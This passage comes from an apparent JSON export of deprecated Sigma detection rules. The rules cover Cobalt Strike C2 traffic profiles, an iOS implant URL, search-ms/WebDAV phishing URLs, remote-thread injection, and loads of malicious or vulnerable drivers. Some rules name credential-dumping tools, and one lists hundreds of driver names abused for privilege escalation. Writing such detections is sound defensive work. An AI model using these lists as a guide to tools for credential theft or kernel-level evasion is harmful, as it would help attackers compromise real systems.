    "content": "title: CobaltStrike Malformed UAs in Malleable Profiles\nid: 41b42a36-f62c-4c34-bd40-8cb804a34ad8\nstatus: deprecated\ndescription: Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike\nreferences:\n    - https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/05/06\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection1:\n        c-useragent:\n            - 'Mozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.1)'\n            - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E )'\n            - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08'\n    selection2:\n        c-useragent|endswith: '; MANM; MANM)'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_ocsp.yml",
    "content": "title: CobaltStrike Malleable (OCSP) Profile\nid: 37325383-740a-403d-b1a2-b2b4ab7992e7\nstatus: deprecated\ndescription: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile\nauthor: Markus Neis\ndate: 2019/11/12\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/oscp/'\n        cs-host: 'ocsp.verisign.com'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_onedrive.yml",
    "content": "title: CobaltStrike Malleable OneDrive Browsing Traffic Profile\nid: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc\nstatus: deprecated\ndescription: Detects Malleable OneDrive Profile\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile\nauthor: Markus Neis\ndate: 2019/11/12\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|endswith: '\\?manifest=wac'\n        cs-host: 'onedrive.live.com'\n    filter:\n        c-uri|startswith: 'http'\n        c-uri|contains: '://onedrive.live.com/'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_ios_implant.yml",
    "content": "title: iOS Implant URL Pattern\nid: e06ac91d-b9e6-443d-8e5b-af749e7aa6b6\nstatus: deprecated # Deprecated to being related to Ios so logging will vary and its old\ndescription: Detects URL pattern used by iOS Implant\nreferences:\n    - https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html\n    - https://twitter.com/craiu/status/1167358457344925696\nauthor: Florian Roth (Nextron Systems)\ndate: 2019/08/30\nmodified: 2024/02/26\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.collection\n    - attack.t1005\n    - attack.t1119\n    - attack.credential_access\n    - attack.t1528\n    - attack.t1552.001\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains: '/list/suc\\?name='\n    condition: selection\nfields:\n    - ClientIP\n    - c-uri\n    - c-useragent\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "deprecated/web/proxy_webdav_search_ms.yml",
    "content": "title: Search-ms and WebDAV Suspicious Indicators in URL\nid: 5039f3d2-406a-4c1a-9350-7a5a85dc84c2\nstatus: deprecated # See https://github.com/SigmaHQ/sigma/pull/4845\ndescription: Detects URL pattern used by search(-ms)/WebDAV initial access campaigns.\nreferences:\n    - https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html\n    - https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462\nauthor: Micah Babinski\ndate: 2023/08/21\nmodified: 2024/05/10\ntags:\n    - attack.initial_access\n    - attack.t1584\n    - attack.t1566\nlogsource:\n    category: proxy\ndetection:\n    selection_search_ms:\n        c-uri|contains|all:\n            - 'search' # Matches on search:query= or search-ms:query=\n            - ':query='\n            - 'webdav'\n    selection_search_term:\n        c-uri|contains:\n            # Note: Add additional keywords for additional coverage\n            - 'agreement'\n            - 'invoice'\n            - 'notice'\n            - 'payment'\n    filter_main_local_ips:\n        dst_ip|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "deprecated/windows/create_remote_thread_win_susp_remote_thread_target.yml",
    "content": "title: Suspicious Remote Thread Target\nid: f016c716-754a-467f-a39e-63c06f773987\nstatus: deprecated\ndescription: |\n  Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\n  This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\n  It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/08/25\nmodified: 2023/05/05\nlogsource:\n    product: windows\n    category: create_remote_thread\ndetection:\n    selection:\n        TargetImage|endswith:\n            - '\\spoolsv.exe'\n            - '\\notepad.exe'\n    filter:\n        - SourceImage|endswith: '\\csrss.exe'\n        - SourceImage|contains: 'unknown process'\n        - StartFunction: 'EtwpNotificationThread'\n    condition: selection and not filter\nfields:\n    - ComputerName\n    - User\n    - SourceImage\n    - TargetImage\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_mal_creddumper.yml",
    "content": "title: Credential Dumping Tools Service Execution\nid: df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2\nrelated:\n    - id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed\n      type: derived\nstatus: deprecated\ndescription: Detects well-known credential dumping tools execution via service execution events\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2017/03/05\nmodified: 2023/12/11\ntags:\n    - attack.credential_access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\n    - attack.t1569.002\n    - attack.s0005\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|contains:\n            - 'cachedump'\n            - 'dumpsvc'\n            - 'fgexec'\n            - 'gsecdump'\n            - 'mimidrv'\n            - 'pwdump'\n            - 'servpw'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using credential dumping tool for password recovery\nlevel: critical\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_mal_poortry_driver.yml",
    "content": "title: Usage Of Malicious POORTRY Signed Driver\nid: 91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6\nstatus: deprecated\ndescription: Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.\nreferences:\n    - https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/12/16\nmodified: 2023/09/13\ntags:\n    - attack.privilege_escalation\n    - attack.t1543\n    - attack.t1068\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection_image:\n        ImageLoaded|contains:\n            - '\\prokiller64.sys'\n            - '\\gftkyj64.sys'\n            - '\\KApcHelper_x64.sys'\n            - '\\NodeDriver.sys'\n            - '\\LcTkA.sys'\n    selection_sysmon:\n        Hashes|contains:\n            - 'SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc'\n            - 'SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c'\n            - 'SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104'\n            - 'SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c'\n            - 'SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4'\n            - 'SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497'\n            - 'SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a'\n            - 'SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d'\n            - 'SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c'\n            - 'SHA1=cc65bf60600b64feece5575f21ab89e03a728332'\n            - 'SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e'\n            - 'SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98'\n            - 'MD5=10f3679384a03cb487bda9621ceb5f90'\n            - 'MD5=04a88f5974caa621cee18f34300fc08a'\n            - 'MD5=6fcf56f6ca3210ec397e55f727353c4a'\n            - 'MD5=0f16a43f7989034641fd2de3eb268bf1'\n            - 'MD5=ee6b1a79cb6641aa44c762ee90786fe0'\n            - 'MD5=909f3fc221acbe999483c87d9ead024a'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate BIOS driver updates (should be rare)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_powershell_script_installed_as_service.yml",
    "content": "title: PowerShell Scripts Run by a Services\nid: 46deb5e1-28c9-4905-b2df-51cdcc9e6073\nrelated:\n    - id: a2e5019d-a658-4c6a-92bf-7197b54e2cae\n      type: derived\nstatus: deprecated\ndescription: Detects powershell script installed as a Service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/06\nmodified: 2023/12/11\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_avast_anti_rootkit_driver.yml",
    "content": "title: Vulnerable AVAST Anti Rootkit Driver Load\nid: 7c676970-af4f-43c8-80af-ec9b49952852\nstatus: deprecated\ndescription: Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products\nreferences:\n    - https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/07/28\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection_sysmon:\n        Hashes|contains:\n            - 'MD5=a179c4093d05a3e1ee73f6ff07f994aa'\n            - 'SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4'\n            - 'SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1'\n    driver_img:\n        ImageLoaded|endswith: '\\aswArPot.sys'\n    driver_status:\n        - Signed: 'false'\n        - SignatureStatus: Expired\n    condition: selection_sysmon or all of driver_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_dell_driver.yml",
    "content": "title: Vulnerable Dell BIOS Update Driver Load\nid: 21b23707-60d6-41bb-96e3-0f0481b0fed9\nstatus: deprecated\ndescription: Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551\nreferences:\n    - https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/05/05\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - cve.2021.21551\n    - attack.t1543\n    - attack.t1068\nlogsource:\n    category: driver_load\n    product: windows\ndetection:\n    selection_image:\n        ImageLoaded|contains: '\\DBUtil_2_3.Sys'\n    selection_sysmon:\n        Hashes|contains:\n            - 'SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5'\n            - 'SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1'\n            - 'SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD'\n            - 'SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25'\n            - 'MD5=C996D7971C49252C582171D9380360F2'\n            - 'MD5=D2FD132AB7BBC6BBB87A84F026FA0244'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate BIOS driver updates (should be rare)\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_drivers_names.yml",
    "content": "title: Vulnerable Driver Load By Name\nid: 839f1ee1-292d-495a-bf37-818267b8ee82\nrelated:\n    - id: 7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8\n      type: derived\nstatus: deprecated\ndescription: Detects the load of known vulnerable drivers via their names only.\nreferences:\n    - https://loldrivers.io/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022/10/03\nmodified: 2023/09/03\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\n    - attack.t1068\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImageLoaded|endswith:\n            - '\\reddriver.sys'\n            - '\\mhyprot2.sys'\n            - '\\hwos2ec7x64.sys'\n            - '\\asrdrv103.sys'\n            - '\\e29f6311ae87542b3d693c1f38e4e3ad.sys'\n            - '\\gvcidrv64.sys'\n            - '\\spwizimgvt.sys'\n            - '\\hwos2ec10x64.sys'\n            - '\\e939448b28a4edc81f1f974cebf6e7d2.sys'\n            - '\\phymemx64.sys'\n            - '\\dh_kernel.sys'\n            - '\\bs_def.sys'\n            - '\\nbiolib_x64.sys'\n            - '\\viraglt64.sys'\n            - '\\ntiolib.sys'\n            - '\\paniox64.sys'\n            - '\\libnicm.sys'\n            - '\\phymem64.sys'\n            - '\\fiddrv.sys'\n            - '\\cpuz141.sys'\n            - '\\yyprotect64.sys'\n            - '\\daxin_blank3.sys'\n            - '\\aswarpot.sys'\n            - '\\t8.sys'\n            - '\\driver7-x86-withoutdbg.sys'\n            - '\\dcr.sys'\n            - '\\b3.sys'\n            - '\\asupio.sys'\n            - '\\blackbonedrv10.sys'\n            - '\\rzpnk.sys'\n            - '\\iomem64.sys'\n            - '\\kfeco11x64.sys'\n            - '\\t.sys'\n            - '\\wantd.sys'\n            - '\\mimikatz.sys'\n            - '\\wantd_4.sys'\n            - '\\chaos-rootkit.sys'\n            - '\\mhyprot.sys'\n            - '\\nlslexicons0024uvn.sys'\n            - '\\piddrv64.sys'\n            - '\\aswvmm.sys'\n            - '\\superbmc.sys'\n            - '\\kprocesshacker.sys'\n            - '\\lmiinfo.sys'\n            - '\\jokercontroller.sys'\n            - '\\blackbone.sys'\n            - '\\fur.sys'\n            - '\\vboxmousent.sys'\n            - '\\mapmom.sys'\n            - '\\windows-xp-64.sys'\n            - '\\d3.sys'\n            - '\\inpout32.sys'\n            - '\\tfbfs3ped.sys'\n            - '\\etdsupp.sys'\n            - '\\asmmap64.sys'\n            - '\\lurker.sys'\n            - '\\alsysio64.sys'\n            - '\\ntiolib_x64.sys'\n            - '\\asas.sys'\n            - '\\vproeventmonitor.sys'\n            - '\\dbutil_2_3.sys'\n            - '\\malicious.sys'\n            - '\\cpupress.sys'\n            - '\\netfilter2.sys'\n            - '\\wintapix.sys'\n            - '\\mhyprotnap.sys'\n            - '\\ktes.sys'\n            - '\\titidrv.sys'\n            - '\\rtcore64.sys'\n            - '\\physmem.sys'\n            - '\\d.sys'\n            - '\\asrdrv106.sys'\n            - '\\winiodrv.sys'\n            - '\\phlashnt.sys'\n            - '\\sfdrvx64.sys'\n            - '\\ene.sys'\n            - '\\nqrmq.sys'\n            - '\\phydmaccx86.sys'\n            - '\\fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys'\n            - '\\magdrvamd64.sys'\n            - '\\a26363e7b02b13f2b8d697abb90cd5c3.sys'\n            - '\\amdryzenmasterdriver.sys'\n            - '\\amigendrv64.sys'\n            - '\\d2.sys'\n            - '\\agent64.sys'\n            - '\\bs_rcio64.sys'\n            - '\\goad.sys'\n            - '\\bsmi.sys'\n            - '\\nvflsh64.sys'\n            - '\\gametersafe.sys'\n            - '\\ndislan.sys'\n            - '\\bw.sys'\n            - '\\directio32.sys'\n            - '\\asrsmartconnectdrv.sys'\n            - '\\ktgn.sys'\n            - '\\eneio64.sys'\n            - '\\amp.sys'\n            - '\\gdrv.sys'\n            - '\\tmel.sys'\n            - '\\nstr.sys'\n            - '\\winring0.sys'\n            - '\\fiddrv64.sys'\n            - '\\tmcomm.sys'\n            - '\\daxin_blank2.sys'\n            - '\\poortry2.sys'\n            - '\\bsmemx64.sys'\n            - '\\asio.sys'\n            - '\\gmer64.sys'\n            - '\\panio.sys'\n            - '\\ucorew64.sys'\n            - '\\atszio64.sys'\n            - '\\nt2.sys'\n            - '\\pciecubed.sys'\n            - '\\nvflsh32.sys'\n            - '\\ssport.sys'\n            - '\\wcpu.sys'\n            - '\\winio64.sys'\n            - '\\msio64.sys'\n            - '\\black.sys'\n            - '\\nicm.sys'\n            - '\\daxin_blank1.sys'\n            - '\\my.sys'\n            - '\\tgsafe.sys'\n            - '\\dbk64.sys'\n            - '\\proxydrv.sys'\n            - '\\1fc7aeeff3ab19004d2e53eae8160ab1.sys'\n            - '\\capcom.sys'\n            - '\\asio32.sys'\n            - '\\proxy32.sys'\n            - '\\asrdrv102.sys'\n            - '\\vboxguest.sys'\n            - '\\vboxtap.sys'\n            - '\\daxin_blank.sys'\n            - '\\poortry.sys'\n            - '\\ntbios.sys'\n            - '\\glckio2.sys'\n            - '\\dbutildrv2.sys'\n            - '\\kfeco10x64.sys'\n            - '\\lenovodiagnosticsdriver.sys'\n            - '\\netfilter.sys'\n            - '\\corsairllaccess64.sys'\n            - '\\semav6msr.sys'\n            - '\\bs_rciow1064.sys'\n            - '\\vboxusbmon.sys'\n            - '\\nodedriver.sys'\n            - '\\iobitunlocker.sys'\n            - '\\smep_namco.sys'\n            - '\\asio64.sys'\n            - '\\xjokercontroller.sys'\n            - '\\irec.sys'\n            - '\\asribdrv.sys'\n            - '\\mhyprot3.sys'\n            - '\\daxin_blank6.sys'\n            - '\\fidpcidrv.sys'\n            - '\\bandai.sys'\n            - '\\procexp.sys'\n            - '\\daxin_blank5.sys'\n            - '\\daxin_blank4.sys'\n            - '\\bedaisy.sys'\n            - '\\asrdrv10.sys'\n            - '\\bwrsh.sys'\n            - '\\eio.sys'\n            - '\\winio64a.sys'\n            - '\\citmdrv_ia64.sys'\n            - '\\7.sys'\n            - '\\b.sys'\n            - '\\bwrs.sys'\n            - '\\nt3.sys'\n            - '\\wiseunlo.sys'\n            - '\\ncpl.sys'\n            - '\\ctiio64.sys'\n            - '\\hw.sys'\n            - '\\asromgdrv.sys'\n            - '\\bs_hwmio64.sys'\n            - '\\lgdatacatcher.sys'\n            - '\\rtkio.sys'\n            - '\\winio32.sys'\n            - '\\phydmaccx64.sys'\n            - '\\mtcbsv64.sys'\n            - '\\ni.sys'\n            - '\\b4.sys'\n            - '\\directio64.sys'\n            - '\\vboxdrv.sys'\n            - '\\nvflash.sys'\n            - '\\hpportiox64.sys'\n            - '\\bs_i2c64.sys'\n            - '\\iomap64.sys'\n            - '\\vboxusb.sys'\n            - '\\msqpq.sys'\n            - '\\sysinfo.sys'\n            - '\\mhyprotect.sys'\n            - '\\naldrv.sys'\n            - '\\lgdcatcher.sys'\n            - '\\echo_driver.sys'\n            - '\\otipcibus.sys'\n            - '\\testbone.sys'\n            - '\\lctka.sys'\n            - '\\wyproxy64.sys'\n            - '\\pchunter.sys'\n            - '\\amdpowerprofiler.sys'\n            - '\\wantd_3.sys'\n            - '\\test2.sys'\n            - '\\rtcoremini64.sys'\n            - '\\d4.sys'\n            - '\\piddrv.sys'\n            - '\\panmonflt.sys'\n            - '\\windows8-10-32.sys'\n            - '\\wantd_5.sys'\n            - '\\mjj0ge.sys'\n            - '\\kt2.sys'\n            - '\\rtkiow8x64.sys'\n            - '\\nstrwsk.sys'\n            - '\\msio32.sys'\n            - '\\ktmutil7odm.sys'\n            - '\\hwrwdrv.sys'\n            - '\\nchgbios2x64.sys'\n            - '\\bs_hwmio64_w10.sys'\n            - '\\mydrivers.sys'\n            - '\\t7.sys'\n            - '\\wantd_6.sys'\n            - '\\sandra.sys'\n            - '\\atillk64.sys'\n            - '\\cpuz.sys'\n            - '\\netproxydriver.sys'\n            - '\\protects.sys'\n            - '\\asrrapidstartdrv.sys'\n            - '\\dh_kernel_10.sys'\n            - '\\ef0e1725aaf0c6c972593f860531a2ea.sys'\n            - '\\enetechio64.sys'\n            - '\\citmdrv_amd64.sys'\n            - '\\iqvw64e.sys'\n            - '\\bsmixp64.sys'\n            - '\\bs_i2cio.sys'\n            - '\\prokiller64.sys'\n            - '\\netflt.sys'\n            - '\\4748696211bd56c2d93c21cab91e82a5.sys'\n            - '\\openlibsys.sys'\n            - '\\adv64drv.sys'\n            - '\\be6318413160e589080df02bb3ca6e6a.sys'\n            - '\\cupfixerx64.sys'\n            - '\\se64a.sys'\n            - '\\speedfan.sys'\n            - '\\a236e7d654cd932b7d11cb604629a2d0.sys'\n            - '\\winio32b.sys'\n            - '\\winio64b.sys'\n            - '\\sysdrv3s.sys'\n            - '\\lv561av.sys'\n            - '\\bs_def64.sys'\n            - '\\mlgbbiicaihflrnh.sys'\n            - '\\dbutil.sys'\n            - '\\834761775.sys'\n            - '\\kdriver.sys'\n            - '\\spf.sys'\n            - '\\dkrtk.sys'\n            - '\\bs_flash64.sys'\n            - '\\nt4.sys'\n            - '\\4.sys'\n            - '\\directio32_legacy.sys'\n            - '\\viragt64.sys'\n            - '\\hostnt.sys'\n            - '\\poortry1.sys'\n            - '\\c94f405c5929cfcccc8ad00b42c95083.sys'\n            - '\\b1.sys'\n            - '\\wantd_2.sys'\n            - '\\mhyprotrpg.sys'\n            - '\\nscm.sys'\n            - '\\smep_capcom.sys'\n            - '\\sense5ext.sys'\n            - '\\lha.sys'\n            - '\\atszio.sys'\n            - '\\amifldrv64.sys'\n            - '\\blacklotus_driver.sys'\n            - '\\asrautochkupddrv.sys'\n            - '\\cpuz_x64.sys'\n            - '\\asrautochkupddrv_1_0_32.sys'\n            - '\\bs_rcio.sys'\n            - '\\elbycdio.sys'\n            - '\\fidpcidrv64.sys'\n            - '\\elrawdsk.sys'\n            - '\\telephonuafy.sys'\n            - '\\rwdrv.sys'\n            - '\\lgcoretemp.sys'\n            - '\\segwindrvx64.sys'\n            - '\\windows7-32.sys'\n            - '\\asrsetupdrv103.sys'\n            - '\\hwinfo32.sys'\n            - '\\inpoutx64.sys'\n            - '\\asrdrv101.sys'\n            - '\\asupio64.sys'\n            - '\\monitor_win10_x64.sys'\n            - '\\msrhook.sys'\n            - '\\nt5.sys'\n            - '\\wfshbr64.sys'\n            - '\\driver7.sys'\n            - '\\sfdrvx32.sys'\n            - '\\asrdrv104.sys'\n            - '\\gameink.sys'\n            - '\\hwinfo64i.sys'\n            - '\\bsmix64.sys'\n            - '\\winio32a.sys'\n            - '\\kbdcap64.sys'\n            - '\\5a4fe297c7d42539303137b6d75b150d.sys'\n            - '\\fairplaykd.sys'\n            - '\\a9df5964635ef8bd567ae487c3d214c4.sys'\n            - '\\fgme.sys'\n            - '\\skill.sys'\n            - '\\capcom2.sys'\n            - '\\typelibde.sys'\n            - '\\nt6.sys'\n            - '\\winio64c.sys'\n            - '\\driver7-x64.sys'\n            - '\\air_system10.sys'\n            - '\\panmonfltx64.sys'\n            - '\\ntbios_2.sys'\n            - '\\viragt.sys'\n            - '\\zam64.sys'\n            - '\\vmdrv.sys'\n            - '\\iqvw64.sys'\n            - '\\1.sys'\n            - '\\t3.sys'\n            - '\\2.sys'\n            - '\\gftkyj64.sys'\n            - '\\proxy64.sys'\n            - '\\kevp64.sys'\n            - '\\netfilterdrv.sys'\n            - '\\4118b86e490aed091b1a219dba45f332.sys'\n            - '\\6771b13a53b9c7449d4891e427735ea2.sys'\n            - '\\mimidrv.sys'\n            - '\\driver7-x86.sys'\n            - '\\windbg.sys'\n            - '\\80.sys'\n            - '\\directio.sys'\n            - '\\atomicredteamcapcom.sys'\n            - '\\81.sys'\n            - '\\full.sys'\n            - '\\asrdrv.sys'\n            - '\\kapchelper_x64.sys'\n            - '\\c.sys'\n            - '\\winflash64.sys'\n            - '\\amsdk.sys'\n    condition: selection\nfalsepositives:\n    - False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non-vulnerable version.\n    - If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)\nlevel: low\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_gigabyte_driver.yml",
    "content": "title: Vulnerable GIGABYTE Driver Load\nid: 7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647\nstatus: deprecated\ndescription: Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation\nreferences:\n    - https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b\n    - https://twitter.com/malmoeb/status/1551449425842786306\n    - https://github.com/fengjixuchui/gdrv-loader\n    - https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details\n    - https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/07/25\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        Hashes|contains:\n            - 'MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3'\n            - 'MD5=C832A4313FF082258240B61B88EFA025'\n            - 'SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39'\n            - 'SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46'\n            - 'SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427'\n            - 'SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_hw_driver.yml",
    "content": "title: Vulnerable HW Driver Load\nid: 9bacc538-d1b9-4d42-862e-469eafc05a41\nstatus: deprecated\ndescription: Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation\nreferences:\n    - https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/\n    - https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details\nauthor: Florian Roth (Nextron Systems)\ndate: 2022/07/26\nmodified: 2023/09/12\ntags:\n    - attack.privilege_escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection_name:\n        ImageLoaded|endswith: '\\HW.sys'\n    selection_sysmon:\n        Hashes|contains:\n            - 'SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8'\n            - 'SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA'\n            - 'SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5'\n            - 'SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57'\n            - 'SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD'\n            - 'SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A'\n            - 'MD5=3247014BA35D406475311A2EAB0C4657'\n            - 'MD5=376B1E8957227A3639EC1482900D9B97'\n            - 'MD5=45C2D133D41D2732F3653ED615A745C8'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/windows/driver_load_win_vuln_lenovo_driver.yml",
